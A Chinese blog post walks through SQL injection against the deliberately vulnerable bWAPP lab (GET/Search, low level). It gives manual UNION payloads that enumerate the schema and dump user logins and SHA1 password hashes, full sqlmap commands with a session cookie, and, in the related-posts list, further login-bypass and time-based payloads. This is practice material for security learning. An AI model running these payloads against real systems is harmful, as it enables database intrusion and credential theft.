【bwapp】SQL Injection(GET/Search)——low级别

已于 2023-06-15 00:39:56 修改
阅读量546 收藏 3
点赞数 4
分类专栏: 靶场和漏洞练习 #bwapp 文章标签: mysql web安全
于 2023-06-13 20:59:39 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_71801652/article/details/131146566
版权

(一)手工注入
1、判断注入点及注入类型
在搜索框中随便输入a,可以查询到标题带有a的全部电影信息,输入b查询出不同的数据,说明title是一个可变参数,这也是存在sql注入的必备条件之一。
在这里插入图片描述
为了验证猜想,在页面正常查询的情况下,在title参数后加单引号’,页面出现报错
在这里插入图片描述

根据提示的报错信息,还需要闭合%
猜测后台数据库查询语句可能为 select * from table where title like ‘%’. $name . ‘%’;
接下来进行语句闭合之后,进一步验证:
title=a%’ and 1=1%23 页面正常
在这里插入图片描述
title=a%’ and 1=2%23 页面异常或报错
在这里插入图片描述

至此,基本确定了注入的存在,参数title存在注入,注入类型为字符型注入。

2、判断字段数
title=a%’ order by 8%23 页面报错
在这里插入图片描述

title=a%’ order by 7%23 页面正常
在这里插入图片描述
可以判断出字段数为7。

3、利用联合查询确定回显位置
title=-a%’ union select 1,2,3,4,5,6,7%23
在这里插入图片描述
确定回显位置为2,3,4,5。

4、查询当前数据库,当前用户,版本等信息
title=-a%’ union select 1,database(),user(),4,version(),6,7%23
在这里插入图片描述
数据库:bwapp
用户:root@localhost
版本:5.5.53

5、查询指定数据库中的表
title=-a%’ union select 1,2,table_name,4,version(),6,7 from information_schema.tables where table_schema=database()%23
在这里插入图片描述
得到很多表名,一般用户名密码会存放在users表中,下面直接爆这张表的数据。

6、查询users表中的列名
title=-a%’ union select 1,2,group_concat(column_name),4,version(),6,7 from information_schema.columns where table_schema=database() and table_name=‘users’%23
在这里插入图片描述
得到users表中的所有列名。

7、查询users表中的数据
title=-a%’ union select 1,id,login,password,5,6,7 from users%23
在这里插入图片描述
在这里插入图片描述

可以得到两个注册的用户名和对应的密码,密码采用了sha1加密,可用在线网站解密之后得到明文密码为:bug。

(二)自动化注入
工具:sqlmap
1、注入点测试
按照常规方式进行注入点的测试时,出现报错信息:在login.php界面时出现状态码302,没有cookie信息,未能成功登录,需要获取cookie。
在这里插入图片描述
使用burpsuite工具在登陆界面后进行抓包,获取cookie信息,得到PHPSESSID。
在这里插入图片描述
在sqlmap加上cookie信息,进行注入点的确定,爆出数据库信息:
sqlmap -u “http://192.168.150.138/bwapp/sqli_1.php?title=a&action=search” --cookie “security level=0;PHPSESSID=15dtet5j88angqejr6t4msh5i5” -dbs
在这里插入图片描述
在这里插入图片描述

2、查询当前数据库
sqlmap -u “http://192.168.150.138/bwapp/sqli_1.php?title=a&action=search” --cookie “security level=0;PHPSESSID=15dtet5j88angqejr6t4msh5i5” -current-db
在这里插入图片描述
得到当前数据库为bwapp。

3、查询bwapp数据库下的表名
sqlmap -u “http://192.168.150.138/bwapp/sqli_1.php?title=a&action=search” --cookie “security level=0;PHPSESSID=15dtet5j88angqejr6t4msh5i5” --tables -D bwapp
在这里插入图片描述
得到bwapp数据库下的表有:blog、heroes、movies、users、visitors。

4、查询users表下的列名
sqlmap -u “http://192.168.150.138/bwapp/sqli_1.php?title=a&action=search” --cookie “security level=0;PHPSESSID=15dtet5j88angqejr6t4msh5i5” --columns -D bwapp -T users
在这里插入图片描述
得到users表中的所有字段名。

5、查询users表中的相关数据
sqlmap -u “http://192.168.150.138/bwapp/sqli_1.php?title=a&action=search” --cookie “security level=0;PHPSESSID=15dtet5j88angqejr6t4msh5i5” --dump -T users
在这里插入图片描述
在这里插入图片描述
成功获取到users表中的数据,注册用户名和密码,电子邮箱等信息。
!!!注意点
很多网站的功能都是需要登陆后才能访问,而http本身是无状态的,因此服务器通常是通过cookie确认用户身份。sqlmap进行检测时,默认是不带cookie的,发出去的请求会被服务器拒之门外。这时,我们需要带上cookie才能进行sql注入检测。
本次自动化注入如果不加上cookie的话,是没有办法出现注入结果的,问就是失败了几次的经验之谈/(ㄒoㄒ)/~~

到这里,就成功采用两种方式对目标靶场进行了注入操作,yep!

Coisini话不投机养乐多
关注
  • 4
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻击方式学习之SQL注入(SQL Injection)第1/3页
10-30
有些网站将直接拿用户的输入 来拼接SQL语句,进行查询等操作,同时也将错误信息暴露给用户。
Sql学习第一天——SQL 练习题(建表/sql语句)
12-15
建表: 代码如下: set nocount on –当 SET NOCOUNT 为 ON 时,不返回计数(表示受 Transact-SQL 语句影响的行数)。当 SET NOCOUNT 为 OFF 时,返回计数 use SY GO if object_Id(‘dbo.Orders’) is not null drop ...
BWAPPsql注入部分详解
tianzhende_kun的博客
02-28 797
可以看到, 联合查询3的位置对应password字段, 且password字段的值是经过md5加密过的, 由于用户名和密码是分开进行判断的, 为了能够回显出报错信息, 需要注入的联合查询字段(顺序为3)与输入的密码相等。注入语句IronMan' and if (length(database())=5,sleep(5),1) --1。' union select 1,2,3,4,5,6,7,8,9,10 # 报错。尝试万能密码: 1’ or 1=1 –- 1。尝试万能密码:1' or 1=1 -- 1。
bWAPP靶场 injection SQL Injection GET/Search
2301_77205899的博客
04-23 263
bWAPP靶场入门 简单sql注入过程 bWAPP靶场 injection SQL Injection GET/Search
学习web 安全笔记(第十一天)-作业,bwapp的sql注入
最新发布
04-03 195
注意h后面有一个单引号,使用union联合,最后用--后面要有一个空格跟后面的隔开。看有没有sql注入漏洞,输入h',发现加了单引号后,有返回报错信息。然后开始通过union修改该语句,确认select返回的实际字段。由于密码比较简单,所以解密网站通过彩虹表爆破的方式解开了密码。用A.I.M.账号,密码bug。通过显示,可以看到,2/3/5、4列是可以显示出来的。环境:使用已经搭建好的docker里的bwapp。通过不断增加select的列。根据列信息去进一步获得表的内容信息。获得账号和密码信息。
bWAPP中SQL注入思路
qq_37019068的博客
10-09 1253
bWAPP中SQL注入思路 SQL Injection (GET/Search) 等级:low 首先看看正常搜索的情况,这里我输入了一个字母b,可以看出来他把标题带有b的电影信息全都给搜出来了 在这里我猜想其构成SQL语句的代码: $sql = "select * from table where Title like '%" . $name . "%'" 接下来为了验证猜想,我输入了一个单引号 返回了一个报错,直接证明了服务器未对单引号进行过滤,意味着我们可以使用单引号进行SQL语句的闭合控制,且也
bwapp靶场笔记 -SQL注入
m0_52149675的博客
10-30 1538
​启动靶场。
BWAPP之SQL注入通关
qq_43665434的博客
04-17 2722
1、SQL injection(GET/search) low 输入单引号直接报错,说明有注入点 直接order by二分法得出主查询字段数为7 直接union注入,测出回显点为2,3,4,5 查数据库信息: 测出数据库名为bwapp,用户为root,版本为5.5.53 查询表名: 查询字段名: 查字段值: 没有难度。 medium 尝试多种方法都不行,看了一眼源码: 发现是用addslashes()进行转义的,尝试了下宽字节绕过,也不行。 看了下原来数据库采用的是urf8编码,本来想改成g..
advanced_sql_injection.rar_sql injection
09-24
how to prevent sql injection attack
sql injection(SQL注入)教程
10-25
sql injection(SQL注入)教程 1判断有无sql注入漏洞 2union注入 3盲注 4报错注入 5堆叠注入 6二次注入 ...
SQL Injection-Blind-Time-Based(bWAPP)注入思路
****的博客
08-23 1304
靶机:bWAPP bug:SQL Injection-Blind-Time-Based 难度等级:low 分析 无论输入什么字符串,都会返回“The result will be sent by e-mail...”。因此首先要确定该处是否存在注入。因此这里可以参考基于时间的注入方法。本文使用主要使用if(exp1,exp2,exp3)及sleep函数,根据网络的延迟去判断是否发生注入。 ...
SQL注入-bWAPP靶场-时间盲注
m0_62665450的博客
01-04 294
sql-时间盲注
深度学习案例之基于 CNN 的 MNIST 手写数字识别
fenglepeng的博客
09-07 6859
一、模型结构 本文只涉及利用Tensorflow实现CNN的手写数字识别,CNN的内容请参考:卷积神经网络(CNN) MNIST数据集的格式与数据预处理代码input_data.py的讲解请参考 :Tutorial (2) 二、实验代码 # -*- coding: utf-8 -*- import tensorflow as tf # 导入input_data用于自动下载和安装MNIST数据集 from tensorflow.examples.tutorials.mnist import inpu
bwapp---sql注入第三四关过关过程及分析
weixin_45821250的博客
12-04 1284
这个是POST,要用bp来做,过程和之前一样。 这里说下bp操作的要点,首先你要在bp的proxy的option添加你的代理,我们一般用本机的127.0.0.1:8080,浏览器的代理也要设置,这里推荐FoxyProxy。代理设置好后,打开抓包按钮 之后获取的信息放在重放器里。进行分析。 如果要get和post一起请求可以在上面GET构造,在下面写post的内容 get请求了1,post请求了123456 ...
How to do sql injections with SQLMAP
安全汪
11-20 639
--------书写只是为了更好的思考                                                                       By:PgHook 0x1 前面的废话 0x2 传统的手工   第一步、判断是否存在注入点   第二步、得到数据库的消息 0x3、sqlmap 传统用法   1、枚举数据库   2、列出数据库中
跟bWAPP学WEB安全(PHP代码)--SQL注入的一些技巧
weixin_30399155的博客
01-20 480
背景 模拟环境还是 bWAPP,只不过这个bWAPP的SQL注入有点多,一一写意义不大,在这边就利用这个环境来尝试一些SQL注入的技巧。并研究下PHP的防御代码。 普通的bWAPPSQL注入的简单介绍 从get型search到CAPTCHA 简单级 #search http://192.168.195.195/bWAPP/sqli_1.php?title=c%%27union%20sel...
bWApp SQL 注入
Yanug
09-26 1162
1.可以显示的字段 1' union select 1,2,3,4,5,6,7# 2.对mysql用户名主机名,当前数据库的版本信息,当前数据库名称,数据库路径等进行查询和显示。 1' union select 1,user(),version(),database(),5,6,7# 3.当前数据库下面的表名: 1' union select 1,table_name,table_sche...
sql_injection之基本get注入
aipei5098的博客
04-14 166
1、代码篇 <?php error_reporting(0); include("../conn.php"); if(isset($_GET['id'])){ $id=$_GET['id']; echo "你当前输入id:".$id."<br>"; $sql="select * from user where id='$id' ...
druid/impala/presto/spark sql/kylin/elasticsearch功能对比
06-28
Druid、Impala、Presto、Spark SQL、Kylin和Elasticsearch都是大数据处理领域的常见工具,它们都有自己的特点和优势。 Druid是一种高性能、列式存储的数据仓库,适用于实时数据分析和查询。它支持快速的聚合查询和...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值